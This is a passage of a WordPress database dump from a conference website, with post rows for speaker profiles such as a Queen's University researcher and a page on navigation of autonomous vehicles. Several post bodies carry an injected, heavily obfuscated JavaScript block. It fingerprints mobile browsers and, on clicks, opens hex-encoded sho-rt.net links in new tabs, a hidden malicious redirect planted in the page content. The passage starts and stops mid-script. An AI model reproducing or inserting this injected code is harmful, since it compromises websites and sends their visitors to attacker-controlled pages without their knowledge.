g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','NGC of AV: Navigation, Guidance and Control of Autonomous Vehicles','','inherit','closed','closed','','2856-revision-v1','','','2022-10-14 22:33:33','2022-10-14 22:33:33','',2856,'https://gsw2023.com/?p=2861',0,'revision','',0),
(2862,1,'2022-10-14 22:34:28','2022-10-14 22:34:28','<!-- wp:paragraph -->\n<p>Royal Military College of Canada</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Queen’s University Canada</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Dr. Aboelmagd Noureldin','','publish','closed','closed','','dr-aboelmagd-noureldin','','','2022-10-14 22:35:57','2022-10-14 22:35:57','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2862',0,'dt_team','',0),
(2863,1,'2022-10-14 22:34:24','2022-10-14 22:34:24','','w161','','inherit','open','closed','','w161','','','2022-10-14 22:34:24','2022-10-14 22:34:24','',2862,'https://gsw2023.com/wp-content/uploads/2022/10/w161.jpg',0,'attachment','image/jpeg',0),
(2864,1,'2022-10-14 22:35:09','2022-10-14 22:35:09','<!-- wp:paragraph -->\n<p>Queen’s University Canada</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 